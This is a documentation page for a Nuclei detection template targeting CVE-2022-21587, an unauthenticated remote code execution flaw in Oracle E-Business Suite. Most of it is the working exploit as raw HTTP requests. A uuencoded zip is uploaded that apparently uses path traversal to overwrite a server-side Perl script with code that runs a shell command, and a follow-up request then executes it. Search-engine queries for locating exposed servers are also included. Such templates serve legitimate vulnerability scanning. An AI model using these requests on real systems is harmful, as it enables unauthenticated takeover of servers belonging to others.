Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution
ID: CVE-2022-21587
Severity: critical
Author: rootxharsh,iamnoooob,pdresearch
Tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm
Description
Section titled “Description”Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
YAML Source
Section titled “YAML Source”id: CVE-2022-21587
info: name: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution author: rootxharsh,iamnoooob,pdresearch severity: critical description: | Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. remediation: | Apply the necessary security patches provided by Oracle to mitigate this vulnerability. reference: - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/ - https://www.oracle.com/security-alerts/cpuoct2022.html - https://nvd.nist.gov/vuln/detail/CVE-2022-21587 - http://packetstormsecurity.com/files/171208/Oracle-E-Business-Suite-EBS-Unauthenticated-Arbitrary-File-Upload.html - https://github.com/manas3c/CVE-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-21587 cwe-id: CWE-306 epss-score: 0.97364 epss-percentile: 0.99901 cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: oracle product: e-business_suite shodan-query: http.title:"login" "x-oracle-dms-ecid" 200 fofa-query: title="login" "x-oracle-dms-ecid" 200 google-query: intitle:"login" "x-oracle-dms-ecid" 200 tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm
http: - raw: - | POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload"
TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
begin 664 test.zip M4$L#!!0``````"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9. M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&5A9&5R*"`M='EP92`]/B`G M=&5X="]P;&%I;B<@*3L*;7D@)&-M9"`](")E8VAO($YU8VQE:2U#5D4M,C`R M,BTR,34X-R(["G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI="`P.PH*4$L!`A0# M%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````"XN+RXN M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R G:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP`````` ` end ------WebKitFormBoundaryZsMro0UsAQYLDZGv-- - | GET /OA_CGI/FNDWRR.exe HTTP/1.1 Host: {{Hostname}} - | POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload"
TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
begin 664 test.zip M4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9. M1%=24BYP;`I02P$"%`,4``````!M<#16DP;7,@$````!````0P`````````` M````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5"4RUA M<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$` (``!B```````` ` end
matchers: - type: word part: body_2 words: - Nuclei-CVE-2022-21587# digest: 4a0a004730450220139550564a940941a1e7e7c50733e00ee79bacd854326db11210ffb831c6ffb3022100e4b982c364480d452256824e1af6118433429f7f1aa55f155e101d24c369ec0d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-21587.yaml"